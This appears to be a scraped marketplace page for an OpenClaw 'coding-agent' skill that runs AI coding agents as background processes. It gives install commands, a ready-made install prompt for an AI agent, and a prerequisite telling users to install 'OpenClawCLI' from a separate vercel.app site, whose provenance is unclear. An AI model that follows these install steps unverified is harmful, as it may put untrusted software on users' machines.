Execute and manage top-tier AI coding agents as background processes for autonomous, parallel software development.
The fastest way to install a skill directly from the registry.
npx clawhub@latest install coding-agent9vr
Copy the skill folder to one of these locations
~/.openclaw/skills/ <project>/skills/ Priority: Workspace > Local > Bundled
Copy this prompt to OpenClaw to install it automatically.
Help me install coding-agent9vr using Clawhub. If Clawhub is not installed, install it first (npm i -g clawhub).
Get the raw skill files in a ZIP archive.
The Coding Agent skill is a powerhouse for developers using Openclaw Skills to automate repetitive coding tasks. It provides a programmatic interface to control leading AI agents like Codex CLI, Claude Code, OpenCode, and Pi Coding Agent. By leveraging background execution, this skill allows you to trigger complex coding workflows without locking up your terminal, enabling a parallel army of agents to work on different parts of your project simultaneously.
This skill emphasizes the workdir pattern, which ensures that your AI agents operate in focused environments. By isolating agents to specific directories, you prevent them from accessing unrelated sensitive files while providing the necessary context for high-quality code generation and review. It is an essential component for any developer looking to scale their output using Openclaw Skills.
Before using this skill, ensure OpenClawCLI is installed. You must also have at least one supported agent binary available in your system path. Use the following commands to set up the environment for Openclaw Skills:
# Ensure OpenClawCLI is installed from https://openclawcli.vercel.app
# To use the Pi Coding Agent:
npm install -g @mariozechner/pi-coding-agent
# Verify your agent binaries are accessible:
which codex || which claude || which pi
The Coding Agent skill manages data through session-based isolation and process metadata within Openclaw Skills.
| Attribute | Description |
|---|---|
| sessionId | A unique identifier generated for every background coding process for tracking. |
| workdir | The specific filesystem path where the agent is localized to prevent context bleed. |
| process:log | The streaming buffer of STDOUT and STDERR for a specific agent session. |
| process:list | A registry containing the status and metadata of all active and historical sessions. |
Loading
A powerful skill for running AI coding agents like Codex and Claude Code in background processes for automated, parallel development tasks.

A comprehensive diagnostic suite for monitoring performance, analyzing errors, and tracking session statistics for Clawdbot.

A powerful integration for macOS that allows users to manage Bear notes programmatically through the grizzly CLI and Openclaw Skills.

A structured architectural framework for fostering integrated self-awareness and temporal continuity in AI systems.

A background-first skill to programmatically control AI coding agents like Codex, Claude Code, and Pi for automated development workflows.

A background-first utility for executing and managing AI coding agents like Codex, Claude Code, and Pi for automated software development.








































